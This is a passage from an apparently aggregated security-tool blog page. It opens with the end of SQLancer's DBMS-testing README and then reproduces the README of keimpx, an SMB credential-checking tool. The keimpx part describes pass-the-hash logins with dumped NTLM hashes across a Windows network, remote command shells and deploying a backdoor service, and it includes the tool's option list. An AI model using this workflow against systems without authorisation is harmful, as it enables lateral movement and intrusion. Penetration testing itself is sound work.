SQLancer stores logs in the target/logs subdirectory. By default, the option --log-each-select is enabled, which results in every SQL statement that is sent to the DBMS being logged. The corresponding file names are postfixed with -cur.log. In addition, if SQLancer detects a logic bug, it creates a file with the extension .log, in which the statements to reproduce the bug are logged.


Reducing a Bug

After finding a bug, it is useful to produce a minimal test case before reporting the bug, to save the DBMS developers' time and effort. For many test cases, C-Reduce does a great job. In addition, we have been working on a SQL-specific reducer, which we plan to release soon.


Found Bugs

We would appreciate it if you mention SQLancer when you report bugs found by it. We would also be excited to know if you are using SQLancer to find bugs, or if you have extended it to test another DBMS (also if you do not plan to contribute it to this project). SQLancer has found over 400 bugs in widely-used DBMS, which are listed here.


Community

We have created a Slack workspace to discuss SQLancer, and DBMS testing in general. SQLancer's official Twitter handle is @sqlancer_dbms.


Additional Documentation

Releases

Official release are available on:


Additional Resources
  • A talk on Ternary Logic Partitioning (TLP) and SQLancer is available on YouTube.
  • An (older) Pivoted Query Synthesis (PQS) talk is available on YouTube.
  • PingCAP has implemented PQS, NoREC, and TLP in a tool called go-sqlancer.
  • More information on our DBMS testing efforts and the bugs we found is available here.


Keimpx - Check For Valid Credentials Across A Network Over SMB

22 August 2021 at 21:30
By: Zion3R


keimpx is an open source tool, released under the Apache License 2.0.

It can be used to quickly check for valid credentials across a network over SMB. Credentials can be:

  • Combination of user / plain-text password.
  • Combination of user / NTLM hash.
  • Combination of user / NTLM logon session token.

If any valid credentials are discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use. They will then be provided with an interactive SMB shell where the user can:

  • Spawn an interactive command prompt.
  • Navigate through the remote SMB shares: list, upload, download files, create, remove files, etc.
  • Deploy and undeploy their own services, for instance, a backdoor listening on a TCP port for incoming connections.
  • List users details, domains and password policy.
  • More to come, see the issues page.

Dependencies

keimpx is currently developed using Python 3.8 and makes use of the excellent Impacket library from SecureAuth Corporation for much of its functionality. keimpx also makes use of the PyCryptodome library for cryptographic functions.


Installation

To install keimpx, first install Python 3.8. On Windows, you can find the installer at this link. For Linux users, many distributions provide Python 3 and make it available via your package manager (usual package names include python3 and python).

On Linux systems, you may also need to install pip and openssl-dev using your package manager for the next step.

Once you have Python 3.8 installed, use pip to install the required dependencies using this command:

pip install -r requirements.txt

keimpx can then be executed by running on Linux systems:

./keimpx.py [options]

Or if this doesn't work:

python keimpx.py [options]
python3 keimpx.py [options]

On Windows systems, you may need to specify the full path to your Python 3.8 binary, for example:

C:\Python37\bin\python.exe keimpx.py [options]

Please ensure you use the correct path for your system, as this is only an example.


Usage

Let's say you are performing an infrastructure penetration test of a large network, you owned a Windows workstation, escalated your privileges to Administrator or LOCAL SYSTEM and dumped password hashes.

You also enumerated the list of machines within the Windows domain via net command, ping sweep, ARP scan and network traffic sniffing.

Now, what if you want to check for the validity of the dumped hashes without the need to crack them across the whole Windows network over SMB? What if you want to login to one or more system using the dumped NTLM hashes then surf the shares or even spawn a command prompt?

Fire up keimpx and let it do the work for you!

Another scenario where it comes handy is discussed in this blog post.


Help message
keimpx 0.5.1-rc
by Bernardo Damele A. G. <[email protected]>

Usage: keimpx.py [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-2 (default: 0)
-t TARGET Target address
-l LIST File with list of targets
-U USER User
-P PASSWORD Password
--nt=NTHASH NT hash
--lm=LMHASH LM hash
-c CREDSFILE File with list of credentials
-D DOMAIN Domain
-d DOMAINSFILE File with list of domains
-p PORT SMB port: 139 or 445 (default: 445)
-n NAME Local hostname
-T THREADS Maximum simultaneous connections (default: 10)
-b Batch mode: do not ask to get an interactive SMB shell
-x EXECUTELIST Execute a list of commands against all hosts

For examples see this wiki page.


Frequently Asked Questions

See this wiki page.


License

Copyright 2009-2020 Bernardo Damele A. G. [email protected]

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.


Contributors

Thanks to:

  • deanx - for developing polenum and some classes ripped from him.
  • Wh1t3Fox - for updating polenum to make it compatible with newer versions of Impacket.
  • frego - for his Windows service bind-shell executable and help with the service deploy/undeploy methods.
  • gera, beto and the rest of the SecureAuth Corporation guys - for developing such amazing Python library and providing it with examples.
  • NEXUS2345 - for updating and maintaining keimpx.


โŒ